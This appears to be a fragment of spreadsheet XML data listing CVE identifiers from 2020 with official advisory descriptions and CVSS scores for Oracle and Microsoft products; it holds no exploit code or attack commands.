    <t>Vulnerability in the Oracle FLEXCUBE Investor Servicing product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.1.0, 12.3.0, 12.4.0, 14.0.0 and 14.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Investor Servicing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle FLEXCUBE Investor Servicing accessible data as well as unauthorized access to critical data or complete access to all Oracle FLEXCUBE Investor Servicing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1457</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1425.</t>
  </si>
  <si>
    <t>CVE-2020-14570</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14571</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. While the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 7.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14572</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticat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1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14573</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 11.0.7 and 14.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE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1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14574</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Communications Interactive Session Recorder product of Oracle Communications Applications (component: FACE). Supported versions that are affected are 6.1-6.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Communications Interactive Session Recorder executes to compromise Oracle Communications Interactive Session Recorder. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Communications Interactive Session Recorder accessible data as well as unauthorized update, insert or delete access to some of Oracle Communications Interactive Session Recorder accessible data. CVSS 3.1 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14575</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.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576</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 5.7.30 and prior and 8.0.20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0-14577</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded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1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14578</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit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1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14579</t>
  </si>
  <si>
    <t>CVE-2020-1458</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Microsoft Office improperly validates input before loading dynamic link library (DLL) files, aka 'Microsoft Office Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14580</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Communications Session Border Controller product of Oracle Communications Applications (component: System Admin). Supported versions that are affected are 8.1.0, 8.2.0 and 8.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via SSH to compromise Oracle Communications Session Border Controller. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Session Border Controller, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Communications Session Border Controller accessible data as well as unauthorized update, insert or delete access to some of Oracle Communications Session Border Controller accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Communications Session Border Controller. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14581</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded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1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14582</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: User Registration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9.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1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14583</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit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1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14584</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14585</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14586</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.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587</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise FIN Expenses product of Oracle PeopleSoft (component: Expenses). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Expenses. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Expenses accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Expenses accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14588</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14589</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-1459</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists on ARM implementations that use speculative execution in control flow via a side-channel analysis, aka &amp;quot;straight-line speculation, aka 'Windows ARM Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14590</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Page Request). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14591</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Audit Plug-in). Supported versions that are affected are 8.0.20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0-14592</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Rich Text Editor). Supported versions that are affected are 8.56, 8.57 and 8.58.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0-14593</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable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unauthorized creation, deletion or modification access to critical data or all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1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14594</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Inventory Integration). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Reporting and Analytics. CVSS 3.1 Base Score 6.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14595</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle iLearning product of Oracle iLearning (component: Assessment Manager). Supported versions that are affected are 6.1 and 6.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iLearning. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle iLearning accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle iLearning. CVSS 3.1 Base Score 8.2 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14596</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Address Book). Supported versions that are affected are 12.1.1-12.1.3.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1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14597</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.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598</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Gateway for Mobile Devices product of Oracle E-Business Suite (component: Setup of Mobile Applications). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Gateway for Mobile Devices. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle CRM Gateway for Mobile Devices accessible data as well as unauthorized access to critical data or complete access to all Oracle CRM Gateway for Mobile Devices accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14599</t>
  </si>
  <si>
    <t>CVE-2020-1460</t>
  </si>
  <si>
    <t>CVE-2020-14600</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14601</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14602</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14603</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14604</t>
  </si>
  <si>
    <t>CVE-2020-14605</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14606</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle SD-WAN Edge product of Oracle Communications Applications (component: User Interface). Supported versions that are affected are 8.2 and 9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle SD-WAN Edge. While the vulnerability is in Oracle SD-WAN Edge, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle SD-WAN Edge. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14607</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Fusion Middleware MapViewer product of Oracle Fusion Middleware (component: Tile Server). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Fusion Middleware MapViewer. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Fusion Middleware MapViewer, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Fusion Middleware MapViewer accessible data as well as unauthorized read access to a subset of Oracle Fusion Middleware MapViewer accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14608</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Fusion Middleware MapViewer product of Oracle Fusion Middleware (component: Tile Server). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Fusion Middleware MapViewer. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Fusion Middleware MapViewer accessible data as well as unauthorized read access to a subset of Oracle Fusion Middleware MapViewer accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14609</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Answers). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-1461</t>
  </si>
  <si>
    <t>CVE-2020-14610</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Attachments / File Upload). The supported version that is affected is 12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Applications Framework accessible data as well as unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 7.6 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14611</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebCenter Portal product of Oracle Fusion Middleware (component: Composer). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Portal. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Portal accessible data as well as unauthorized read access to a subset of Oracle WebCenter Portal accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Portal. CVSS 3.1 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14612</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise HRMS product of Oracle PeopleSoft (component: Time and Labor). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HRMS. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HRMS accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HRMS accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14613</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced User Interface). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14614</t>
  </si>
  <si>
    <t>CVE-2020-14615</t>
  </si>
  <si>
    <t>CVE-2020-14616</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Reporting). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality Reporting and Analytics. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Hospitality Reporting and Analytics accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14617</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Unifier product of Oracle Construction and Engineering (component: Platform, Mobile App). Supported versions that are affected are 16.1, 16.2, 17.7-17.12, 18.8 and 19.12; Mobile App: Prior to 20.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Primavera Unifier. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera Unifier accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14618</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Unifier product of Oracle Construction and Engineering (component: Mobile App). The supported version that is affected is Prior to 20.6. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Primavera Unifier. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera Unifier accessible data as well as unauthorized update, insert or delete access to some of Primavera Unifier accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14619</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 8.0.20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0-1462</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Skype for Business is accessed via Microsoft Edge (EdgeHTML-based), aka 'Skype for Business via Microsoft Edge (EdgeHTML-based) Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14620</t>
  </si>
  <si>
    <t>CVE-2020-14621</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14622</t>
  </si>
  <si>
